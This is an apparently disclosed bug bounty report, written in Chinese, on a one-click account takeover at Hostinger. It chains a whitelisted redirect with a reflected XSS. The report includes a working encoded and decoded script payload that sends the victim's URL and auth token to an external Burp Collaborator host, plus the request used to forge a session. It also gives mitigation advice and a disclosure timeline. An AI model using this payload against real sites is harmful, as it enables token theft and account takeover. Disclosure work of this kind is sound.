一键账户接管漏洞：通过Auth Token窃取在marketing.hostinger.com

报告者：aziz0x48
提交时间：2025年4月7日 21:59 UTC
状态：已解决
严重性：高（7.5）

摘要

在Hostinger的marketing.hostinger.com子域名中发现了一个一键账户接管漏洞。由于该子域名属于hostinger.com且被列入重定向白名单，攻击者可以利用它窃取Hostinger用户的认证令牌，仅需受害者一次点击即可完全控制其账户。

复现步骤

1. 登录受害者账户并访问以下URL，将attacker-url替换为您的Burp Collaborator URL或专用服务器URL：

1

https://auth.hostinger.com/login/?redirectUrl=https%3A%2F%2Fmarketing.hostinger.com%2Fen-us%2Fmarketplace_wix%2Fsite_not_published%3Fredirect_url%3Dx%22%3E%3C%2Fa%3E%3Cscript%3Efetch%28%27https%3A%2F%2Fwqqf8xerhgrhdk251cesqastbkhb54xsm.oastify.com%27%2C%20%7Bmethod%3A%20%27POST%27%2Cbody%3A%20window.location%7D%29%3C%2Fscript%3E

解码后的URL：

1

https://auth.hostinger.com/login/?redirectUrl=https://marketing.hostinger.com/en-us/marketplace_wix/site_not_published?redirect_url=x"></a><script>fetch('wqqf8xerhgrhdk251cesqastbkhb54xsm.oastify.com',%20{method:%20'POST',body:%20window.location});</script>

2. 检查Burp Collaborator或服务器日志，获取受害者账户的认证令牌。

3. 攻击者可以使用泄露的认证令牌为受害者账户生成有效的JWT，并通过以下请求完全控制受害者账户：

1
2
3
4
5
6
7
8

POST /hpanel/auth/auth-token HTTP/2
Host: builder-backend.hostinger.com
User-Agent: Mozilla/5.0 Gecko/20100101 Firefox/132.0
Origin: https://builder.hostinger.com
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Te: trailers

建议

marketing.hostinger.com可能已重命名为rankingcoach.com。建议关闭该子域名或将其从白名单域名中移除，以快速缓解问题并增强用户安全性。

影响

此漏洞对Hostinger用户构成重大风险，允许攻击者绕过认证并通过一次点击获得未经授权的账户访问权限。通过利用marketing.hostinger.com子域名（该域名被列入重定向白名单），攻击者可以窃取用户的认证令牌。一旦令牌被泄露，攻击者将获得对受害者Hostinger账户的完全访问权限，包括hPanel、网站构建器、VPS服务器、电子邮件和个人数据等关键服务。此漏洞使所有Hostinger用户面临账户接管、数据盗窃和敏感信息滥用的风险，是一个需要立即关注的严重安全问题。

时间线

• 2025年4月7日 21:59 UTC：aziz0x48提交报告，初始严重性设置为高（8.8）。
• 2025年4月8日 06:08 UTC：Hostinger员工@pausmu确认收到报告。
• 2025年4月8日 11:46 UTC：报告状态更改为“已分类”。
• 2025年4月14日 13:39 UTC：严重性从高（8.8）调整为高（7.5），理由包括子域名超出范围、第三方应用以及受害者需已登录。
• 2025年4月15日 10:45 UTC：奖励发放，报告状态更改为“已解决”。
• 2025年6月6日 11:12 UTC：aziz0x48请求披露报告。
• 2025年6月6日 12:10 UTC：报告被同意披露。

附加信息

• 弱点：不当访问控制 - 通用
• CVE ID：无
• 奖励：隐藏

报告包含截图和视频作为支持材料。